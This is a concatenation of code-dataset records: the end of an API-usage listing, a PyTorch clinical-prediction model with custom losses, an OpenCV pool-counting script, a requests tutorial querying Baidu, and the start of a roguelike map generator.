"usage_type": "call"
},
{
"api_name": "dpath.util.util.search",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "dpath.util.util",
"line_number": 93,
"usage_type": "attribute"
},
{
"api_name": "dpath.util",
"line_number": 93,
"usage_type": "name"
},
{
"api_name": "typing.Dict",
"line_number": 70,
"usage_type": "name"
},
{
"api_name": "typing.Any",
"line_number": 70,
"usage_type": "attribute"
},
{
"api_name": "collections.defaultdict",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "funcy.ldistinct",
"line_number": 114,
"usage_type": "call"
},
{
"api_name": "dvc.utils.serialize.load_path",
"line_number": 144,
"usage_type": "call"
},
{
"api_name": "dvc.utils.serialize.ParseError",
"line_number": 145,
"usage_type": "name"
},
{
"api_name": "dvc_data.hashfile.hash_info.HashInfo",
"line_number": 161,
"usage_type": "call"
}
] |
8585416211
|
import torch
import torch.nn as nn
from torch import cat, exp
import torch.nn.functional as F
from torch.nn.functional import pad
from torch.nn.modules.batchnorm import _BatchNorm
class my_AFF(nn.Module):
'''
Point-wise Convolution based Attention module (PWAtt)
'''
def __init__(self, channels=64, r=2):
super(my_AFF, self).__init__()
inter_channels = int(channels // r)
self.local_att = nn.Sequential(
nn.Conv1d(in_channels=channels, out_channels=inter_channels, kernel_size=1, stride=1, padding=0),
nn.BatchNorm1d(inter_channels),
nn.ReLU(inplace=True),
nn.Conv1d(in_channels=inter_channels, out_channels=channels, kernel_size=1, stride=1, padding=0),
nn.BatchNorm1d(channels),
)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
xa = self.local_att(x)
wei = self.sigmoid(xa)
xo = 2 * x * wei
return xo, wei
# Root Mean Squared Logarithmic Error (RMSLE) loss
class RMSLELoss(nn.Module):
def __init__(self, eps=1e-6):
super(RMSLELoss, self).__init__()
self.squared_error = nn.MSELoss(reduction='none')
self.eps = eps
def forward(self, y_hat, y, mask, seq_length, sum_losses=False):
# the log(predictions) corresponding to no data should be set to 0
# log_y_hat = y_hat.log().where(mask, torch.zeros_like(y))
log_y_hat = torch.log(y_hat + 1).where(mask, torch.zeros_like(y))
# the we set the log(labels) that correspond to no data to be 0 as well
# log_y = y.log().where(mask, torch.zeros_like(y))
log_y = torch.log(y + 1).where(mask, torch.zeros_like(y))
# where there is no data log_y_hat = log_y = 0, so the squared error will be 0 in these places
loss = self.squared_error(log_y_hat, log_y)
rmsle_loss = torch.sqrt(loss + self.eps)
loss = torch.sum(rmsle_loss, dim=1)
if not sum_losses:
loss = loss / seq_length.clamp(min=1)
return loss.mean()
# Root Mean Squared Error (MSE) loss
class RMSELoss(nn.Module):
def __init__(self, eps=1e-6):
super(RMSELoss, self).__init__()
self.squared_error = nn.MSELoss(reduction='none')
self.eps = eps
def forward(self, y_hat, y, mask, seq_length, sum_losses=False):
# the predictions corresponding to no data should be set to 0
y_hat = y_hat.where(mask, torch.zeros_like(y))
# the we set the labels that correspond to no data to be 0 as well
y = y.where(mask, torch.zeros_like(y))
# where there is no data log_y_hat = log_y = 0, so the squared error will be 0 in these places
loss = self.squared_error(y_hat, y)
rmse_loss = torch.sqrt(loss + self.eps)
loss = torch.sum(rmse_loss, dim=1)
if not sum_losses:
loss = loss / seq_length.clamp(min=1)
return loss.mean()
# Mean Squared Logarithmic Error (MSLE) loss
class MSLELoss(nn.Module):
def __init__(self):
super(MSLELoss, self).__init__()
self.squared_error = nn.MSELoss(reduction='none')
def forward(self, y_hat, y, mask, seq_length, sum_losses=False):
# the log(predictions) corresponding to no data should be set to 0
log_y_hat = y_hat.log().where(mask, torch.zeros_like(y))
# the we set the log(labels) that correspond to no data to be 0 as well
log_y = y.log().where(mask, torch.zeros_like(y))
# where there is no data log_y_hat = log_y = 0, so the squared error will be 0 in these places
loss = self.squared_error(log_y_hat, log_y)
loss = torch.sum(loss, dim=1)
if not sum_losses:
loss = loss / seq_length.clamp(min=1)
return loss.mean()
# Mean Squared Error (MSE) loss
class MSELoss(nn.Module):
def __init__(self):
super(MSELoss, self).__init__()
self.squared_error = nn.MSELoss(reduction='none')
def forward(self, y_hat, y, mask, seq_length, sum_losses=False):
# the predictions corresponding to no data should be set to 0
y_hat = y_hat.where(mask, torch.zeros_like(y))
# the we set the labels that correspond to no data to be 0 as well
y = y.where(mask, torch.zeros_like(y))
# where there is no data log_y_hat = log_y = 0, so the squared error will be 0 in these places
loss = self.squared_error(y_hat, y)
loss = torch.sum(loss, dim=1)
if not sum_losses:
loss = loss / seq_length.clamp(min=1)
return loss.mean()
class MyBatchNorm(_BatchNorm):
def __init__(self, num_features, eps=1e-5, momentum=0.1, affine=True,
track_running_stats=True):
super(MyBatchNorm, self).__init__(
num_features, eps, momentum, affine, track_running_stats)
def forward(self, input):
self._check_input_dim(input)
# hack to work around model.eval() issue
if not self.training:
self.eval_momentum = 0 # set the momentum to zero when the model is validating
if self.momentum is None:
exponential_average_factor = 0.0
else:
exponential_average_factor = self.momentum if self.training else self.eval_momentum
if self.track_running_stats:
if self.num_batches_tracked is not None:
self.num_batches_tracked = self.num_batches_tracked + 1
if self.momentum is None: # use cumulative moving average
exponential_average_factor = 1.0 / float(self.num_batches_tracked)
else: # use exponential moving average
exponential_average_factor = self.momentum if self.training else self.eval_momentum
return F.batch_norm(
input, self.running_mean, self.running_var, self.weight, self.bias,
training=True, momentum=exponential_average_factor, eps=self.eps) # set training to True so it calculates the norm of the batch
class MyBatchNorm1d(MyBatchNorm):
def _check_input_dim(self, input):
if input.dim() != 2 and input.dim() != 3:
raise ValueError('expected 2D or 3D input (got {}D input)'.format(input.dim()))
class EmptyModule(nn.Module):
def forward(self, X):
return X
class TempSepConv_CAFF(nn.Module):
def __init__(self, config, no_ts_features=None, no_daig_features=None, no_flat_features=None):
super(TempSepConv_CAFF, self).__init__()
self.task = config['task']
self.n_layers = config['n_layers']
self.diagnosis_size = config['diagnosis_size']
self.main_dropout_rate = config['main_dropout_rate']
self.temp_dropout_rate = config['temp_dropout_rate']
self.kernel_size = config['kernel_size']
self.temp_kernels = config['temp_kernels']
self.last_linear_size = config['last_linear_size']
self.no_ts_features = no_ts_features
self.no_daig_features = no_daig_features
self.no_flat_features = no_flat_features
self.no_diag = config['no_diag']
self.alpha = 100
self.keep_prob = 1-config['main_dropout_rate'] #0.5
self.relu = nn.ReLU()
self.sigmoid = nn.Sigmoid()
self.hardtanh = nn.Hardtanh(min_val=1/48, max_val=100) # keep the end predictions between half an hour and 100 days
self.rmsle_loss = RMSLELoss()
self.msle_loss = MSLELoss()
self.mse_loss = MSELoss()
self.bce_loss = nn.BCELoss()
self.main_dropout = nn.Dropout(p=self.main_dropout_rate)
self.temp_dropout = nn.Dropout(p=self.temp_dropout_rate)
self.remove_none = lambda x: tuple(xi for xi in x if xi is not None) # removes None items from a tuple
self.empty_module = EmptyModule()
self.batchnormclass = MyBatchNorm1d
# self.batchnormclass = nn.BatchNorm1d
self.diagnosis_encoder = nn.Linear(in_features=self.no_daig_features, out_features=self.diagnosis_size)
self.diagnosis_encoder1 = nn.Linear(in_features=self.no_daig_features, out_features=self.temp_kernels[0]+1)
self.flat_encoder = nn.Linear(in_features=self.no_flat_features, out_features=self.temp_kernels[0]+1)
self.bn_diagnosis_encoder = self.batchnormclass(num_features=self.diagnosis_size, momentum=0.1) # input shape: B * diagnosis_size
self.bn_point_last_los = self.batchnormclass(num_features=self.last_linear_size, momentum=0.1) # input shape: (B * T) * last_linear_size
self.bn_point_last_mort = self.batchnormclass(num_features=self.last_linear_size, momentum=0.1) # input shape: (B * T) * last_linear_size
# self.bn_diagnosis_encoder = self.empty_module
# self.bn_point_last_los = self.empty_module
# self.bn_point_last_mort = self.empty_module
# input shape: (B * T) * last_linear_size
# output shape: (B * T) * 1
self.final_los = nn.Linear(in_features=self.last_linear_size, out_features=1)
self.final_mort = nn.Linear(in_features=self.last_linear_size, out_features=1)
# TDSC layers settings
self.layers = []
for i in range(self.n_layers):
dilation = i * (self.kernel_size - 1) if i > 0 else 1 # dilation = 1 for the first layer, after that it captures all the information gathered by previous layers
temp_k = self.temp_kernels[i]
self.layers.append({})
if temp_k is not None:
padding = [(self.kernel_size - 1) * dilation, 0] # [padding_left, padding_right]
self.layers[i]['temp_kernels'] = temp_k
self.layers[i]['dilation'] = dilation
self.layers[i]['padding'] = padding
self.layers[i]['stride'] = 1
self.layer_modules = nn.ModuleDict()
self.Y = 0 # Y is the number of channels in the previous temporal layer (could be 0 if this is the first layer)
self.n = 0 # n is the layer number
for i in range(self.n_layers):
temp_in_channels = (self.no_ts_features + self.n) * (1 + self.Y) if i > 0 else 2 * self.no_ts_features # (F + n) * (Y + 1)
temp_out_channels = (self.no_ts_features + self.n) * self.layers[i]['temp_kernels'] # (F + n) * temp_kernels
out_channels_caff = (self.no_ts_features+self.n+1)*(self.layers[i]['temp_kernels']+1)
if self.n == 0:
linear_input_dim = (self.no_ts_features + self.n - 1) * self.Y + 2 * self.no_ts_features + 2 + self.no_flat_features
else:
linear_input_dim = (self.no_ts_features + self.n - 1) * self.Y + (self.layers[i]['temp_kernels']+1) + 2 * self.no_ts_features + 2 + self.no_flat_features # (F + n-1) * Y + Z + 2F + 2 + no_flat_features
linear_output_dim = (self.layers[i]['temp_kernels']+1)
temp = nn.Conv1d(in_channels=temp_in_channels, # (F + n) * (Y + 1)
out_channels=temp_out_channels, # (F + n) * Y
kernel_size=self.kernel_size,
stride=self.layers[i]['stride'],
dilation=self.layers[i]['dilation'],
groups=self.no_ts_features + self.n)
caff_fc = nn.Linear(in_features=linear_input_dim, out_features=linear_output_dim)
bn_temp = self.batchnormclass(num_features=temp_out_channels, momentum=0.1)
bn_caff = self.batchnormclass(num_features=linear_output_dim, momentum=0.1)
# bn_temp = bn_point = self.empty_module # linear module; does nothing
A_layer = my_AFF(out_channels_caff)
FFA_layer = my_AFF(linear_input_dim)
self.layer_modules[str(i)] = nn.ModuleDict({
'temp': temp,
'bn_temp': bn_temp,
'caff_fc': caff_fc,
'bn_caff': bn_caff,
'A_layer': A_layer,
'FFA_layer': FFA_layer})
self.Y = self.layers[i]['temp_kernels']
self.n += 1
# input shape: (B * T) * ((F + n) * (1 + Y) + diagnosis_size + no_flat_features)
# output shape: (B * T) * last_linear_size
# input_size = (self.no_ts_features + self.n) * (1 + self.Y) + self.diagnosis_size + self.no_flat_features
#input_size = (self.no_ts_features + self.n) * (1 + self.Y) + self.diagnosis_size + self.no_flat_features
input_size = (self.no_ts_features + self.n) * (1 + self.Y) + (self.n_layers * (1 + self.Y)) + self.diagnosis_size + self.no_flat_features
if self.no_diag:
# input_size = input_size - self.diagnosis_size
input_size = input_size - self.diagnosis_size #input_size - self.diagnosis_size
self.last_los_fc = nn.Linear(in_features=input_size, out_features=self.last_linear_size)
self.last_mort_fc = nn.Linear(in_features=input_size, out_features=self.last_linear_size)
return
def tdsc_caff(self, B=None, T=None, X=None, repeat_flat=None, X_orig=None, temp=None, bn_temp=None, caff_fc=None,
bn_caff=None, A_layer=None, FFA_layer=None, temp_kernels=None, padding=None, prev_temp=None, prev_caff=None, m_scale_output=None,
caff_skip=None):
X_padded = pad(X, padding, 'constant', 0) # B * ((F + n) * (Y + 1)) * (T + padding)
X_temp = self.temp_dropout(bn_temp(temp(X_padded))) # B * ((F + n) * temp_kernels) * T
#### Context Aware Attentive Feature Fusion (CAFF) #####
if prev_caff is None:
X_concat = cat(self.remove_none((prev_temp, # (B * T) * ((F + n-1) * Y)
prev_caff, # (B * T) * 1
X_orig, # (B * T) * (2F + 2)
repeat_flat)), # (B * T) * no_flat_features
dim=1) # (B * T) * (((F + n-1) * Y) + 1 + 2F + 2 + no_flat_features)
else:
X_concat = cat(self.remove_none((prev_temp.view(B*T,-1), # (B * T) * ((F + n-1) * Y)
prev_caff.permute(0,3,1,2).view(B*T,-1), # (B * T) * 1
X_orig, # (B * T) * (2F + 2)
repeat_flat)), # (B * T) * no_flat_features
dim=1) # (B * T) * (((F + n-1) * Y) + 1 + 2F + 2 + no_flat_features)
X_concat, wei_1 = FFA_layer(X_concat.view(B,T,-1).permute(0,2,1)) # Step 2 Attention
X_concat = X_concat.permute(0,2,1).view(B*T,-1)
caff_output = self.main_dropout(bn_caff(caff_fc(X_concat))) # (B * T) * 1
caff_output = caff_output.view(B, T, -1).unsqueeze(2).permute(0,2,3,1)
# Accumulate multi-scale features
m_scale_output = cat((m_scale_output,caff_output), dim=1) if m_scale_output is not None else caff_output
caff_skip = cat((caff_skip, prev_caff[:,:,-1,:].unsqueeze(2)), dim=1) if prev_caff is not None else caff_skip
temp_skip = cat((caff_skip, # B * (F + n) * 1 * T
X_temp.view(B, caff_skip.shape[1], temp_kernels, T)), # B * (F + n) * temp_kernels * T
dim=2) # B * (F + n) * (1 + temp_kernels) * T
X_combined = self.relu(cat((temp_skip, caff_output), dim=1)) # B * (F + n) * (1 + temp_kernels) * T
next_X = X_combined.view(B, (caff_skip.shape[1] + 1) * (1 + temp_kernels), T) # B * ((F + n + 1) * (1 + temp_kernels)) * T
next_X, wei_2 = A_layer(next_X.view(B,-1,T)) # step 4 attention
next_X = next_X.view(B, (caff_skip.shape[1] + 1) * (1 + temp_kernels), T)
temp_output = X_temp.permute(0, 2, 1).contiguous().view(B * T, caff_skip.shape[1] * temp_kernels) # (B * T) * ((F + n) * temp_kernels)
return (temp_output, # (B * T) * ((F + n) * temp_kernels)
caff_output, # (B * T) * 1
next_X, # B * ((F + n) * (1 + temp_kernels)) * T
caff_skip, # caff features of the prevous layer
m_scale_output, # keeping track of the caff multi scale features from all layers; B * (F + n) * T
wei_1, wei_2) # PWatt Attention weights
def forward(self, X, diagnoses, flat, time_before_pred=5):
# flat is B * no_flat_features
# diagnoses is B * no_daig_features
# X is B * no_daig_features * T
# split into features and indicator variables
X_separated = torch.split(X[:, 1:-1, :], self.no_ts_features, dim=1) # tuple ((B * F * T), (B * F * T))
# prepare repeat arguments and initialise layer loop
B, _, T = X_separated[0].shape
repeat_flat = flat.repeat_interleave(T, dim=0) # (B * T) * no_flat_features
X_orig = X.permute(0, 2, 1).contiguous().view(B * T, 2 * self.no_ts_features + 2) # (B * T) * (2F + 2)
repeat_args = {'repeat_flat': repeat_flat,
'X_orig': X_orig,
'B': B,
'T': T}
next_X = torch.stack(X_separated, dim=2).reshape(B, 2 * self.no_ts_features, T)
caff_skip = X_separated[0].unsqueeze(2) # ts features without indicators, keeps track of caff skip connections generated from caff module;
temp_output = None
caff_output = None
m_scale_output = None
wei_step2 = []
wei_step4 = []
for i in range(self.n_layers):
kwargs = dict(self.layer_modules[str(i)], **repeat_args)
temp_output, caff_output, next_X, caff_skip, m_scale_output, wei_1, wei_2 = self.tdsc_caff(X=next_X, caff_skip=caff_skip,
prev_temp=temp_output, prev_caff=caff_output,
temp_kernels=self.layers[i]['temp_kernels'],
padding=self.layers[i]['padding'],
m_scale_output= m_scale_output,
**kwargs)
wei_step2.append(wei_1.detach().cpu())
wei_step4.append(wei_2.detach().cpu())
m_scale_output = m_scale_output.view(B,-1,T)
if self.no_diag:
combined_features = cat((flat.repeat_interleave(T - time_before_pred, dim=0), # (B * (T - time_before_pred)) * no_flat_features
next_X[:, :, time_before_pred:].permute(0, 2, 1).contiguous().view(B * (T - time_before_pred), -1),
m_scale_output[:, :, time_before_pred:].permute(0, 2, 1).contiguous().view(B * (T - time_before_pred), -1)), dim=1) # (B * (T - time_before_pred)) * (((F + n) * (1 + Y)) + no_flat_features) for tpc
else:
diagnoses_enc = self.relu(self.main_dropout(self.bn_diagnosis_encoder(self.diagnosis_encoder(diagnoses)))) # B * diagnosis_size
combined_features = cat((flat.repeat_interleave(T - time_before_pred, dim=0), # (B * (T - time_before_pred)) * no_flat_features
diagnoses_enc.repeat_interleave(T - time_before_pred, dim=0), # (B * (T - time_before_pred)) * diagnosis_size
next_X[:, :, time_before_pred:].permute(0, 2, 1).contiguous().view(B * (T - time_before_pred), -1),
m_scale_output[:, :, time_before_pred:].permute(0, 2, 1).contiguous().view(B * (T - time_before_pred), -1)), dim=1) # (B * (T - time_before_pred)) * (((F + n) * (1 + Y)) + diagnosis_size + no_flat_features) for tpc
last_los = self.relu(self.main_dropout(self.bn_point_last_los(self.last_los_fc(combined_features))))
last_mort = self.relu(self.main_dropout(self.bn_point_last_mort(self.last_mort_fc(combined_features))))
los_predictions = self.hardtanh(exp(self.final_los(last_los).view(B, T - time_before_pred))) # B * (T - time_before_pred)
mort_predictions = self.sigmoid(self.final_mort(last_mort).view(B, T - time_before_pred)) # B * (T - time_before_pred)
return los_predictions, mort_predictions, wei_step2, wei_step4
def loss(self, y_hat_los, y_hat_mort, y_los, y_mort, mask, seq_lengths, device, sum_losses, loss_type):
# mortality loss
if self.task == 'mortality':
loss = self.bce_loss(y_hat_mort, y_mort) * self.alpha
# LoS loss
else:
bool_type = torch.cuda.BoolTensor if device == torch.device('cuda:3') else torch.BoolTensor
if loss_type == 'rmsle':
los_loss = self.rmsle_loss(y_hat_los, y_los, mask.type(bool_type), seq_lengths, sum_losses)
if loss_type == 'msle':
los_loss = self.msle_loss(y_hat_los, y_los, mask.type(bool_type), seq_lengths, sum_losses)
elif loss_type == 'mse':
los_loss = self.mse_loss(y_hat_los, y_los, mask.type(bool_type), seq_lengths, sum_losses)
loss = los_loss
return loss
|
Al-Dailami/DTSC-CAFF
|
dtsc_caff_model.py
|
dtsc_caff_model.py
|
py
| 21,192 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "torch.nn.Module",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sequential",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "torch.nn.Conv1d",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "torch.nn.BatchNorm1d",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "torch.nn.ReLU",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "torch.nn.Conv1d",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "torch.nn.BatchNorm1d",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sigmoid",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "torch.nn.Module",
"line_number": 36,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 36,
"usage_type": "name"
},
{
"api_name": "torch.nn.MSELoss",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 39,
"usage_type": "name"
},
{
"api_name": "torch.log",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "torch.zeros_like",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "torch.log",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "torch.zeros_like",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "torch.sqrt",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "torch.sum",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "torch.nn.Module",
"line_number": 58,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 58,
"usage_type": "name"
},
{
"api_name": "torch.nn.MSELoss",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 61,
"usage_type": "name"
},
{
"api_name": "torch.zeros_like",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "torch.zeros_like",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "torch.sqrt",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "torch.sum",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "torch.nn.Module",
"line_number": 78,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 78,
"usage_type": "name"
},
{
"api_name": "torch.nn.MSELoss",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 81,
"usage_type": "name"
},
{
"api_name": "torch.zeros_like",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "torch.zeros_like",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "torch.sum",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "torch.nn.Module",
"line_number": 97,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 97,
"usage_type": "name"
},
{
"api_name": "torch.nn.MSELoss",
"line_number": 100,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 100,
"usage_type": "name"
},
{
"api_name": "torch.zeros_like",
"line_number": 104,
"usage_type": "call"
},
{
"api_name": "torch.zeros_like",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "torch.sum",
"line_number": 109,
"usage_type": "call"
},
{
"api_name": "torch.nn.modules.batchnorm._BatchNorm",
"line_number": 115,
"usage_type": "name"
},
{
"api_name": "torch.nn.functional.batch_norm",
"line_number": 141,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 141,
"usage_type": "name"
},
{
"api_name": "torch.nn.Module",
"line_number": 152,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 152,
"usage_type": "name"
},
{
"api_name": "torch.nn.Module",
"line_number": 157,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 157,
"usage_type": "name"
},
{
"api_name": "torch.nn.ReLU",
"line_number": 179,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 179,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sigmoid",
"line_number": 180,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 180,
"usage_type": "name"
},
{
"api_name": "torch.nn.Hardtanh",
"line_number": 181,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 181,
"usage_type": "name"
},
{
"api_name": "torch.nn.BCELoss",
"line_number": 185,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 185,
"usage_type": "name"
},
{
"api_name": "torch.nn.Dropout",
"line_number": 187,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 187,
"usage_type": "name"
},
{
"api_name": "torch.nn.Dropout",
"line_number": 188,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 188,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 196,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 196,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 198,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 198,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 199,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 199,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 212,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 212,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 213,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 213,
"usage_type": "name"
},
{
"api_name": "torch.nn.ModuleDict",
"line_number": 229,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 229,
"usage_type": "name"
},
{
"api_name": "torch.nn.Conv1d",
"line_number": 245,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 245,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 252,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 252,
"usage_type": "name"
},
{
"api_name": "torch.nn.ModuleDict",
"line_number": 263,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 263,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 284,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 284,
"usage_type": "name"
},
{
"api_name": "torch.nn.Linear",
"line_number": 285,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 285,
"usage_type": "name"
},
{
"api_name": "torch.nn.functional.pad",
"line_number": 294,
"usage_type": "call"
},
{
"api_name": "torch.cat",
"line_number": 299,
"usage_type": "call"
},
{
"api_name": "torch.cat",
"line_number": 305,
"usage_type": "call"
},
{
"api_name": "torch.cat",
"line_number": 317,
"usage_type": "call"
},
{
"api_name": "torch.cat",
"line_number": 319,
"usage_type": "call"
},
{
"api_name": "torch.cat",
"line_number": 321,
"usage_type": "call"
},
{
"api_name": "torch.cat",
"line_number": 325,
"usage_type": "call"
},
{
"api_name": "torch.split",
"line_number": 348,
"usage_type": "call"
},
{
"api_name": "torch.stack",
"line_number": 360,
"usage_type": "call"
},
{
"api_name": "torch.cat",
"line_number": 383,
"usage_type": "call"
},
{
"api_name": "torch.cat",
"line_number": 388,
"usage_type": "call"
},
{
"api_name": "torch.exp",
"line_number": 397,
"usage_type": "call"
},
{
"api_name": "torch.device",
"line_number": 408,
"usage_type": "call"
},
{
"api_name": "torch.cuda",
"line_number": 408,
"usage_type": "attribute"
},
{
"api_name": "torch.BoolTensor",
"line_number": 408,
"usage_type": "attribute"
}
] |
24455754580
|
# -*- coding: utf-8 -*-
"""
@author: Fatih Kemal Terzi
"""
import cv2
import numpy as np
# Image reading
img = cv2.imread('pools.png')
count=0
# Image converting to HSV color space
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
# Adjusting range of blue color for detecting pools
lower_blue = np.array([80,50,50])
upper_blue = np.array([115,255,255])
# To spesifiying blue region creating binary mask
mask = cv2.inRange(hsv, lower_blue, upper_blue)
# Perform morphological operations to reduce noise
kernel = np.ones((5,5),np.uint8)
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)
mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)
# Find contours of blue regions
contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# Draw bounding boxes around the blue regions
for cnt in contours:
x, y, w, h = cv2.boundingRect(cnt)
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)
count+=1
# Display the result
cv2.imshow('Detected_pools', img)
print('Number of pools : ',count)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
FatihKemalTerzi/Image-Processing
|
Midterm3.py
|
Midterm3.py
|
py
| 1,105 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "cv2.imread",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2HSV",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "numpy.array",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "cv2.inRange",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "cv2.morphologyEx",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "cv2.MORPH_OPEN",
"line_number": 25,
"usage_type": "attribute"
},
{
"api_name": "cv2.morphologyEx",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "cv2.MORPH_CLOSE",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "cv2.findContours",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "cv2.RETR_TREE",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "cv2.CHAIN_APPROX_SIMPLE",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "cv2.boundingRect",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "cv2.rectangle",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "cv2.waitKey",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "cv2.destroyAllWindows",
"line_number": 40,
"usage_type": "call"
}
] |
75131970108
|
import requests
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"}
"传入参数的形式"
params = {"wd":"haha"}
"最后面的问号可加可不加,不加的话,程序会自动帮你加上"
url_temp = "https://www.baidu.com/?"
"注意用requests调用post和get时的函数"
r = requests.get(url_temp, headers=headers, params=params)
print(r.status_code) # 获取请求得到的网页的状态
print(r.request.url) # 获取我们请求得到的网页网址
"下面这个更加简洁"
".format用起来和%s效果是一样的"
url_2 = "https://www.baidu.com/?wd={}".format("haha")
r = requests.get(url_2, headers=headers)
print(r.status_code) # 获取请求得到的网页的状态
print(r.request.url) # 获取我们请求得到的网页网址
|
hahahei957/NewProject_Opencv2
|
venv_2/爬虫/01_HelloWorld.py
|
01_HelloWorld.py
|
py
| 874 |
python
|
zh
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "requests.get",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 22,
"usage_type": "call"
}
] |
41202734206
|
import tcod
import random
import copy
import constants as const
import entity
import render
import numpy as np
import random_loot as rloot
class Room:
"""
A room! Wow.
"""
def __init__(self, x, y, w, h):
self.x = x # upper left point
self.y = y # upper left point
self.w = w
self.h = h
self.n_loot = 0
self.neighbors = []
class GameMap:
def __init__(self, width, height, con, show_map=False):
self.sample = None
self.width = width
self.con = con
self.height = height
